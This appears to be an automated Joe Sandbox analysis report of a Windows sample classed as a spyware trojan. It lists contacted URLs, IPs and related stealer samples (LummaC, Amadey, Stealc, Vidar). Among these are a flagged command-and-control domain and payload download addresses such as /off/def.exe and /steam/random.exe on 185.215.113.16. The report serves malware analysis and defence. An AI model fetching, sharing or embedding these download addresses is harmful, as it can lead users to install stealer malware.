                                            https://www.linkedin.com/cws/share?url=$chromecache_87.7.dr, chromecache_97.7.drfalse
                                              high
                                              https://cook-rain.sbs/apiDfile.exe, 00000000.00000003.2359457203.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417831196.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417305142.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2497882084.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2359739101.0000000005AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • 8%, Virustotal, Browse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2238542196.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238779015.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238617063.0000000005B29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://github.com/Youssef1313chromecache_105.7.drfalse
                                                  high
                                                  https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgfile.exe, 00000000.00000003.2359457203.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417831196.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417305142.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2359739101.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314290707.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342256254.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2341484457.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311289967.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2309656692.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_87.7.dr, chromecache_97.7.drfalse
                                                      high
                                                      https://aka.ms/msignite_docs_bannerchromecache_87.7.dr, chromecache_97.7.drfalse
                                                        high
                                                        https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_97.7.drfalse
                                                          high
                                                          http://polymer.github.io/AUTHORS.txtchromecache_87.7.dr, chromecache_97.7.drfalse
                                                            high
                                                            https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_105.7.drfalse
                                                              high
                                                              http://go.mfile.exefalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_87.7.dr, chromecache_97.7.drfalse
                                                                high
                                                                https://cook-rain.sbs/zSUu%file.exe, 00000000.00000003.2314290707.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311289967.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2309656692.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_105.7.drfalse
                                                                  high
                                                                  http://x1.c.lencr.org/0file.exe, 00000000.00000003.2285856681.0000000005BED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://x1.i.lencr.org/0file.exe, 00000000.00000003.2285856681.0000000005BED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://aka.ms/pshelpmechoosechromecache_87.7.dr, chromecache_97.7.drfalse
                                                                        high
                                                                        https://aka.ms/feedback/report?space=61chromecache_105.7.dr, chromecache_106.7.drfalse
                                                                          high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2238542196.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238779015.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238617063.0000000005B29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://learn-video.azurefd.net/vod/playerchromecache_87.7.dr, chromecache_97.7.drfalse
                                                                              high
                                                                              https://twitter.com/intent/tweet?original_referer=$chromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                high
                                                                                https://github.com/gewarrenchromecache_105.7.drfalse
                                                                                  high
                                                                                  http://185.215.113.16/off/def.exepleWebKit/537.36file.exe, 00000000.00000002.2597460868.0000000000AFA000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://185.215.113.16/steam/random.exeNnfile.exe, 00000000.00000003.2497670571.0000000001220000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2598450174.0000000001206000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: phishing
                                                                                    unknown
                                                                                    https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2287239675.0000000005E05000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://polymer.github.io/CONTRIBUTORS.txtchromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                        high
                                                                                        https://www.mozilla.orfile.exe, 00000000.00000003.2287021208.0000000005B25000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://go.microsoft.cofile.exe, 00000000.00000002.2602050697.0000000005B71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_105.7.drfalse
                                                                                            high
                                                                                            https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_105.7.drfalse
                                                                                              high
                                                                                              https://client-api.arkoselabs.com/v2/api.jschromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                high
                                                                                                https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnlchromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                  high
                                                                                                  https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                    high
                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2238542196.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238779015.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238617063.0000000005B29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://github.com/Thrakachromecache_105.7.drfalse
                                                                                                        high
                                                                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.2309656692.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://polymer.github.io/PATENTS.txtchromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                            high
                                                                                                            https://aka.ms/certhelpchromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                              high
                                                                                                              http://185.215.113.16/steam/random.exefile.exe, 00000000.00000003.2497670571.0000000001220000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2598450174.0000000001206000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://cook-rain.sbs/38efile.exe, 00000000.00000003.2317895828.0000000001283000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317925149.0000000001289000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2318012645.000000000128E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2238542196.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238779015.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238617063.0000000005B29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2285856681.0000000005BED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://github.com/mairawchromecache_105.7.drfalse
                                                                                                                      high
                                                                                                                      http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2285856681.0000000005BED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://schema.orgchromecache_97.7.drfalse
                                                                                                                          high
                                                                                                                          http://polymer.github.io/LICENSE.txtchromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                                            high
                                                                                                                            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=169648449file.exe, 00000000.00000003.2566097864.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2359457203.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417831196.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417305142.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2497882084.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2359739101.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314290707.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2601830088.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342256254.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2341484457.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311289967.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2309656692.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2238542196.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238779015.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238617063.0000000005B29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2287239675.0000000005E05000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_file.exe, file.exe, 00000000.00000003.2566097864.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2359457203.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417831196.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417305142.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2497882084.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2359739101.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314290707.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2601830088.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342256254.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2341484457.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311289967.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2309656692.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://aka.ms/yourcaliforniaprivacychoiceschromecache_105.7.drfalse
                                                                                                                                    high
                                                                                                                                    https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2238542196.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238779015.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238617063.0000000005B29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://github.com/nschonnichromecache_105.7.drfalse
                                                                                                                                        high
                                                                                                                                        http://185.215.113.16/file.exe, 00000000.00000003.2497670571.0000000001220000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://crl.mfile.exe, 00000000.00000003.2417483737.0000000001250000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05chromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                                                              high
                                                                                                                                              https://cook-rain.sbs/apiYfile.exe, 00000000.00000003.2359457203.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417831196.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417305142.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2284780140.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2285514646.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2497882084.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2359739101.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2285188462.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314290707.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342256254.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2341484457.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311289967.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2309656692.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                              unknown
                                                                                                                                              https://github.com/adegeochromecache_105.7.drfalse
                                                                                                                                                high
                                                                                                                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, file.exe, 00000000.00000003.2566097864.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2359457203.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417831196.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417305142.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2497882084.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2359739101.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314290707.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2601830088.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342256254.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2341484457.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311289967.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2309656692.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://cook-rain.sbs/apiz/file.exe, 00000000.00000003.2417779345.0000000001267000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417595797.0000000001267000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  unknown
                                                                                                                                                  https://cook-rain.sbs/$file.exe, 00000000.00000003.2417831196.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417305142.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2497882084.0000000005AF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  unknown
                                                                                                                                                  https://github.com/jonschlinkert/is-plain-objectchromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                                                                    high
                                                                                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2285856681.0000000005BED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://octokit.github.io/rest.js/#throttlingchromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                                                                        high
                                                                                                                                                        http://185.215.113.16/off/def.exe1file.exe, 00000000.00000003.2497670571.0000000001220000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2598450174.0000000001206000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: phishing
                                                                                                                                                        unknown
                                                                                                                                                        https://github.com/js-cookie/js-cookiechromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://cook-rain.sbs/cg/m5Vfile.exe, 00000000.00000003.2284780140.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2285514646.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2285188462.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314290707.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311289967.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2309656692.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                          unknown
                                                                                                                                                          http://185.215.113.16/off/def.exefile.exe, 00000000.00000003.2497670571.0000000001220000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2598450174.0000000001206000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://schema.org/Organizationchromecache_105.7.drfalse
                                                                                                                                                              high
                                                                                                                                                              http://185.215.113.16/&file.exe, 00000000.00000003.2497670571.0000000001220000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              https://channel9.msdn.com/chromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2238542196.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238779015.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238617063.0000000005B29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctafile.exe, 00000000.00000003.2359457203.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417831196.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417305142.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2497882084.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2359739101.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314290707.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342256254.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2341484457.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311289967.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2309656692.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://github.com/dotnet/trychromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                      13.107.246.45
                                                                                                                                                                      s-part-0017.t-0009.t-msedge.netUnited States
                                                                                                                                                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                      185.215.113.16
                                                                                                                                                                      unknownPortugal
                                                                                                                                                                      206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                      216.58.206.68
                                                                                                                                                                      www.google.comUnited States
                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                      188.114.97.3
                                                                                                                                                                      cook-rain.sbsEuropean Union
                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                      239.255.255.250
                                                                                                                                                                      unknownReserved
                                                                                                                                                                      unknownunknownfalse
                                                                                                                                                                      IP
                                                                                                                                                                      192.168.2.6
                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                      Analysis ID:1559919
                                                                                                                                                                      Start date and time:2024-11-21 06:22:11 +01:00
                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                      Overall analysis duration:0h 6m 57s
                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                      Report type:full
                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                      Number of analysed new started processes analysed:10
                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                      Technologies:
                                                                                                                                                                      • HCA enabled
                                                                                                                                                                      • EGA enabled
                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                      Sample name:file.exe
                                                                                                                                                                      Detection:MAL
                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@24/61@9/6
                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                      HCA Information:
                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 192.229.221.95, 199.232.214.172, 184.28.89.167, 142.250.185.67, 142.250.186.78, 74.125.206.84, 95.101.150.2, 34.104.35.123, 2.22.242.139, 2.22.242.82, 142.250.186.138, 142.250.185.74, 142.250.185.106, 172.217.18.10, 142.250.186.42, 216.58.206.74, 142.250.184.234, 142.250.186.74, 142.250.185.202, 142.250.185.138, 142.250.186.106, 172.217.16.202, 142.250.186.170, 216.58.212.138, 142.250.185.170, 142.250.185.234, 142.250.186.163, 2.20.245.137, 2.20.245.135, 142.250.185.110
                                                                                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, learn.microsoft.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, ocsp.digicert.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, clients1.google.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, clients.l.google.com, wcpstatic.microsoft.com
                                                                                                                                                                      • Execution Graph export aborted for target file.exe, PID 1600 because there are no executed function
                                                                                                                                                                      • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                      00:23:14API Interceptor47x Sleep call for process: file.exe modified
                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      188.114.97.3RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                      • www.rgenerousrs.store/o362/
                                                                                                                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                      • www.beylikduzu616161.xyz/2nga/
                                                                                                                                                                      Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                                                                                                                      ce.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • paste.ee/d/lxvbq
                                                                                                                                                                      Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                                                                                                                      PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                      • www.ssrnoremt-rise.sbs/3jsc/
                                                                                                                                                                      QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • filetransfer.io/data-package/zWkbOqX7/download
                                                                                                                                                                      http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                                                                                      gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                                                                                                                      Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                                      • gmtagency.online/api/check
                                                                                                                                                                      13.107.246.45https://pcefan.com/diary/index.php?st-manager=1&path=/click/track&id=4973&type=ranking&url=http://nam.dcv.ms/BxPVLH2cz4Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                      • nam.dcv.ms/BxPVLH2cz4
                                                                                                                                                                      185.215.113.16file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                      • 185.215.113.16/off/def.exe
                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                      • 185.215.113.16/mine/random.exe
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 185.215.113.16/off/def.exe
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 185.215.113.16/off/def.exe
                                                                                                                                                                      E89hSGjVrv.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                      • 185.215.113.16/mine/random.exe
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 185.215.113.16/off/def.exe
                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                      • 185.215.113.16/mine/random.exe
